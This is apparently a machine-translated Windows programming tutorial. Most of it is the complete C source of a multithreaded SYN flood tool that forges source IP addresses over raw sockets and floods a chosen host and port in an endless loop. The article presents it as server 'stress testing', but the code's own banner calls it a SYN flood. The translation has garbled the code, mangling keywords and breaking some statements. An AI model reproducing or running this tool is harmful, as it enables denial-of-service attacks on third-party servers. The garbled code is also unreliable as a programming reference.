Analysis of Windows core programming code based on Visual C ++ (38) server stress test-Syn request

SYN requests implement pressure monitoring using TCP protocol defects and send a large number of forged TCP connection requests, so that the attacked party's resources are exhausted and cannot respond to or process normal service requests in a timely manner. A normal TCP connection requires three handshakes. First, the client sends a packet containing the SYN sign, and the server returns a SYN/ack response packet, indicating that the client request is accepted, finally, the client returns an ACK packet to complete the TCP connection. After the server sends the response packet, if the client does not send a confirmation, the server will wait until the timeout, during which the semi-connection status will be saved in a limited space cache queue; if a large number of SYN packets are not answered after being sent to the server, the TCP resources on the server will be quickly exhausted, leading to a normal connection failure or even server crash.

When developing website projects, we often need to test the server pressure for better network optimization. Syn monitoring is often used to test the server pressure. See the code analysis below to test the server pressure.

 

# Include <winsock2.h> # include <ws2tcpip. h> # include <stdio. h> # pragma comment (Lib, "ws2_32.lib") # define seq 0x28376839int threadnum, maxthread, port; char * destip; // target ipvoid display (void) // define the status prompt function {static int play = 0; // progress bar char * plays [12] = {"| ","/","-", "\", "|", "/", "-", "\", "| ","/","-", "\" ,}; printf ("= % s = % d threads \ r", plays [play], threadnum); play = (play = 11 )? 0: Play + 1;} // define a tcphdr structure to store the TCP Header typedef struct tcphdr {ushort th_sport; // 16-bit source port number ushort th_dport; // 16-bit destination port number unsigned int th_seq; // 32-bit serial number unsigned int th_ack; // 32-bit confirmation number unsigned char th_lenres; // four unsigned char th_flag in the four-digit Header Length + six-digit reserved characters; // the six-digit flag ushort th_win; // The 16-digit window size ushort th_sum; // 16-bit verification and ushort th_urp; // 16-bit emergency data offset} tcp_header; // define an iphdr to store the IP header typedef struct iphdr // IP header {unsigned char h_verlen; // four-digit hand length and four-digit I P version unsigned char TOS; // The 8-bit type service unsigned short total_len; // The 16-bit total length unsigned short ident; // The 16-Bit Flag unsigned short frag_and_flags; // 3-bit flag (such as SYN, ack, etc.) unsigned char TTL; // 8-bit survival time unsigned char proto; // 8-bit protocol unsigned short checksum; // ip hand verification and unsigned int sourceip; // forged IP address unsigned int destip; // attacked IP address} ip_header; // pseudo TCP Header for TCP verification and calculation, ensure the validity of TCP verification struct {unsigned long saddr; // source address unsigned long daddr; // target address Cha R mbz; // empty char ptcl; // protocol type unsigned short tcpl; // TCP length} psd_header; // calculate the verification and function, set the validation and field of the IP header to 0 (ip_header.checksum = 0) // then calculate the sum of the binary anticode of the entire IP header. Ushort checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum + = * buffer ++; size-= sizeof (ushort);} If (size) cksum + = * (uchar *) buffer; cksum = (cksum> 16) + (cksum & 0 xFFFF ); cksum + = (cksum> 16); Return (ushort )(~ Cksum);} DWORD winapi synfloodthread (lpvoid LP) // synflood thread function {socket sock = NULL; int errorcode = 0, flag = true, timeout = 2000, fakeipnet, fakeiphost, datasize = 0, sendseq = 0; struct sockaddr_in sockaddr; tcp_header tcpheader; ip_header ipheader; char sendbuf [128]; sock = wsasocket (af_inet, sock_raw, ipproto_raw, null, 0, wsa_flag_overlapped); If (sock = invalid_socket) {printf ("socket failed: % d \ n", wsagetlasterror (); Return 0;} // Set ip_hdrincl so that you can fill in the IP header errorcode = setsockopt (sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (INT); If (errorcode = socket_error) {printf ("set sockopt failed: % d \ n", wsagetlasterror (); Return 0 ;}// set the sending timeout errorcode = setsockopt (sock, sol_socket, so_sndtimeo, (char *) & timeout, sizeof (timeout); If (errorcode = socket_error) {printf ("set sockopt time out failed: % d \ n ", wsagetlasterror (); Return 0 ;}// set the target address memset (& Sockaddr, 0, sizeof (sockaddr); sockaddr. sin_family = af_inet; sockaddr. sin_addr.s_addr = inet_addr (destip); fakeipnet = inet_addr (destip); fakeiphost = ntohl (fakeipnet); // fill in the IP header ipheader. h_verlen = (4 <4 | sizeof (ip_header)/sizeof (unsigned long); ipheader. total_len = htons (sizeof (ip_header) + sizeof (tcp_header); ipheader. ident = 1; ipheader. frag_and_flags = 0; ipheader. TTL = 128; ipheader. PROTO = ipproto_tcp; ipheade R. checksum = 0; ipheader. sourceip = htonl (fakeiphost + sendseq); ipheader. destip = inet_addr (destip); // fill in the TCP Header tcpheader. th_dport = htons (port); tcpheader. th_sport = htons (8080); tcpheader. th_seq = htonl (SEQ + sendseq); tcpheader. th_ack = 0; tcpheader. th_lenres = (sizeof (tcp_header)/4 <4 | 0); tcpheader. th_flag = 2; tcpheader. th_win= htons (16384); tcpheader. th_urp = 0; tcpheader. th_sum = 0; psd_header.saddr = ipheader. Sourceip; psd_header.daddr = ipheader. destip; psd_header.mbz = 0; psd_header.ptcl = ipproto_tcp; psd_header.tcpl = htons (sizeof (tcpheader); For (;) {sendseq = (sendseq = 65536 )? 1: sendseq + 1; ipheader. checksum = 0; ipheader. sourceip = htonl (fakeiphost + sendseq); tcpheader. th_seq = htonl (SEQ + sendseq); tcpheader. th_sport = htons (sendseq); tcpheader. th_sum = 0; psd_header.saddr = ipheader. sourceip; // copy the TCP pseudo header and TCP header to the same buffer and calculate TCP verification and memcpy (sendbuf, & psd_header, sizeof (psd_header )); memcpy (sendbuf + sizeof (psd_header), & tcpheader, sizeof (tcpheader); tcpheader. th_sum = checksum (ushort *) sendbuf, sizeo F (psd_header) + sizeof (tcpheader); memcpy (sendbuf, & ipheader, sizeof (ipheader); memcpy (sendbuf + sizeof (ipheader), & tcpheader, sizeof (tcpheader); memset (sendbuf + sizeof (ipheader) + sizeof (tcpheader), 0, 4); datasize = sizeof (ipheader) + sizeof (tcpheader); ipheader. checksum = checksum (ushort *) sendbuf, datasize); memcpy (sendbuf, & ipheader, sizeof (ipheader); sendto (sock, sendbuf, datasize, 0, (struct sockaddr *) & sockaddr, sizeo F (sockaddr); display ();} // end for sleep (20); interlockedexchangeadd (long *) & threadnum,-1); Return 0 ;} void usage (char * name) {printf ("\ t ============================ SYN flood ================ ===========\ N "); printf ("\ t =========== gxisone@hotmail.com 2004/7/6 =========\ N"); printf ("\ tusage: % s [dest_ip] [port] [thread] \ n ", name); printf (" \ texample: % s 192.168.1.1 80 100 \ n ", name );} int main (INT argc, char * argv []) {If (argc! = 4) {usage (argv [0]); Return 0;} usage (argv [1]); int errorcode = 0; destip = argv [1]; // obtain the target host ipport = atoi (argv [2]); // obtain the target port number maxthread = (maxthread> 100 )? 100: atoi (argv [3]); // if the number of threads is greater than 100, set the number of threads to 100 wsadata; If (errorcode = wsastartup (makeword ), & wsadata ))! = 0) {printf ("wsastartup failed: % d \ n", errorcode); Return 0;} printf ("[start] ...... \ npress any key to stop! \ N "); While (threadnum <maxthread) // loop creation thread {If (createthread (null, 0, synfloodthread, 0) {sleep (10 ); threadnum ++ ;}} wsacleanup (); printf ("\ n [stopd] ...... \ n "); Return 0 ;}